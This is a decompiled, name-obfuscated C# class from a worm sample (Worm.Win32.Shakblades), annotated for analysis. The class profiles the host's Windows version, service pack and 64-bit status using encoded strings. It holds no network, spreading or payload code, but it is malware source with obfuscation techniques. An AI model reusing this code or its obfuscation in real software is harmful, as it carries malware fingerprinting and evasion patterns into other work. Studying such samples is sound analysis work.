// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.៷˴ᄨᥨᗽ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Runtime.InteropServices;
namespace Ҧ߲๒ʽ໙ୄᴘ
{
/// <summary>
/// Host-profiling helper from a decompiled, name-obfuscated sample.
/// Type, member and field names are the obfuscator's output and are kept
/// exactly as decompiled; only local variable names are descriptive.
/// Every label this class produces is passed through a decoder that lives
/// in another type, so the decoded text is not visible in this listing.
/// </summary>
internal class \u17F7\u02F4ᄨᥨᗽ
{
    /// <summary>
    /// Builds one descriptive string for the host operating system from three parts:
    /// a release label chosen from <see cref="Environment.OSVersion"/>, zero or more
    /// suffixes chosen from the text field filled in by GetVersionEx, and a final tag
    /// chosen by the ProgramW6432 check.
    /// </summary>
    /// <returns>The concatenation of the decoded parts, in that order.</returns>
    public static string ఽ\u087CᏃ()
    {
        OperatingSystem os = Environment.OSVersion;
        string label = "";

        if (os.Platform.ToString() == "Win32NT")
        {
            // Keys are "major.minor.build"; each maps to an encoded release label.
            // NOTE(review): the 4.x keys look like Windows 9x/ME-era numbers, which .NET
            // reports under a platform other than Win32NT, so those cases are
            // presumably unreachable here - confirm.
            string encodedRelease;
            switch (\u17F7\u02F4ᄨᥨᗽ.\u0AE7ԵॻƂẺႦᛀળ(os.Version))
            {
                case "4.1.2222":
                    encodedRelease = "L0FGPEfYO8ENT0v4ERA=";
                    break;
                case "4.1.2600":
                    encodedRelease = "L0FGPEdP2DvBDUv4ERArHQ==";
                    break;
                case "4.9.3000":
                    encodedRelease = "[WINME]";
                    break;
                case "5.0.2195":
                    encodedRelease = "L0FGPEdP2DvBDUv4CggICA==";
                    break;
                case "5.1.2600":
                case "5.2.3790":
                    encodedRelease = "L0FGPEfYO8ENT0v4MCg=";
                    break;
                case "6.0.6000":
                case "6.0.6001":
                case "6.0.6002":
                case "6.0.6003":
                    encodedRelease = "+w0SCBMbpHuKjhfE+g0XGAU=";
                    break;
                case "6.1.7600":
                case "6.1.7601":
                case "6.1.7602":
                case "6.1.7603":
                    encodedRelease = "+w0SCKR7io4TGxfE2w==";
                    break;
                default:
                    encodedRelease = "+RIPpHuKjhITGxI=";
                    break;
            }

            label = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(encodedRelease, true);
        }

        // The native call reads the first field as the caller's structure size,
        // so it is filled in before the struct is passed by reference.
        \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ info = new \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ();
        info.ܨ = Marshal.SizeOf(typeof (\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ));

        if (\u17F7\u02F4ᄨᥨᗽ.ᰐረἣە\u104C(ref info))
        {
            // Each row is { encoded marker, encoded suffix }: when the decoded marker occurs
            // in the version text, the decoded suffix is appended. Rows are tested in order
            // and more than one may match.
            // NOTE(review): the first seven markers differ only in their last encoded
            // character, as do the last two - presumably numbered variants of one phrase
            // (e.g. service-pack levels); confirm by decoding.
            string[,] markerToSuffix =
            {
                { "8wUSFgkDBaDMBSXA8AEDC8DR", "OGsYVzSwaEk=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DS", "OGsYVzSwaEo=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DT", "OGsYVzSwaEs=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DU", "OGsYVzSwaEw=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DV", "OGsYVzSwaE0=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DW", "OGsYVzSwaE4=" },
                { "8wUSFgkDBaDMBSXA8AEDC8DX", "OGsYVzSwaE8=" },
                { "a32KjoF7fRhXNLA4aHl7gzhQ", "iLtoXUo8uKA=" },
                { "a32KjoF7fRhXNLA4aHl7gzhR", "iLtoXUo8uKE=" },
            };

            string versionText = info.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString();
            for (int row = 0; row < markerToSuffix.GetLength(0); row++)
            {
                if (versionText.Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(markerToSuffix[row, 0], true)))
                {
                    label += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(markerToSuffix[row, 1], true);
                }
            }
        }

        // Final tag: one of two encoded values, selected by the ProgramW6432 check.
        string encodedTag;
        if (\u17F7\u02F4ᄨᥨᗽ.ᣁ())
        {
            encodedTag = "iJWIaF1KPOCenA==";
        }
        else
        {
            encodedTag = "iJWIaF1KPOCgng==";
        }

        return label + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(encodedTag, true);
    }

    /// <summary>
    /// Formats a <see cref="Version"/> as "major.minor.build", omitting the revision.
    /// </summary>
    private static string \u0AE7ԵॻƂẺႦᛀળ(Version _param0)
    {
        string[] parts =
        {
            _param0.Major.ToString(),
            _param0.Minor.ToString(),
            _param0.Build.ToString(),
        };
        return string.Join(".", parts);
    }

    // P/Invoke binding for kernel32!GetVersionEx under an obfuscated managed name.
    // No CharSet is specified, so the runtime's default string marshalling applies.
    [DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
    private static extern bool ᰐረἣە\u104C(ref \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ _param0);

    /// <summary>
    /// Reports whether the ProgramW6432 environment variable is set and non-empty.
    /// Windows defines that variable on 64-bit systems, so this presumably serves as
    /// a 64-bit OS check. Any exception is treated as "not set".
    /// </summary>
    public static bool ᣁ()
    {
        try
        {
            string programW6432 = Environment.GetEnvironmentVariable("ProgramW6432");
            return !string.IsNullOrEmpty(programW6432);
        }
        catch
        {
            return false;
        }
    }

    // Buffer passed by reference to GetVersionEx. The shape (five ints, a 128-character
    // inline string, three shorts, two bytes) lines up with the Win32 OSVERSIONINFOEX
    // structure - presumably that is what it mirrors. Field order and sizes are part of
    // the native contract and must not be rearranged.
    public struct ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ
    {
        // Structure size in bytes; set by the caller before the native call.
        public int ܨ;
        public int \u003Fᵚᇛჩᬃഢᨨ\u00F7;
        public int தጢ\u104Bᥞᶑᄧ᭐ώ\u0040;
        public int ᔥڟ;
        public int ṏÕấᮺ\u087D;
        // Inline text buffer; the only field the caller reads back after the call.
        [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
        public string \u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E;
        public short ƹᗰ\u0FC0\u0A56uᅜ;
        public short \u0F72ြॽӰᢟ͒ᣃẈᅂ;
        public short \u0F30ṋᄆᆃẈҤ;
        public byte \u1CED\u0EF0\u0B9BŢᵕ\u1398᩵ᗀἱ;
        public byte \u1DC7ഛեᮈ\u0FD9;
    }
}
}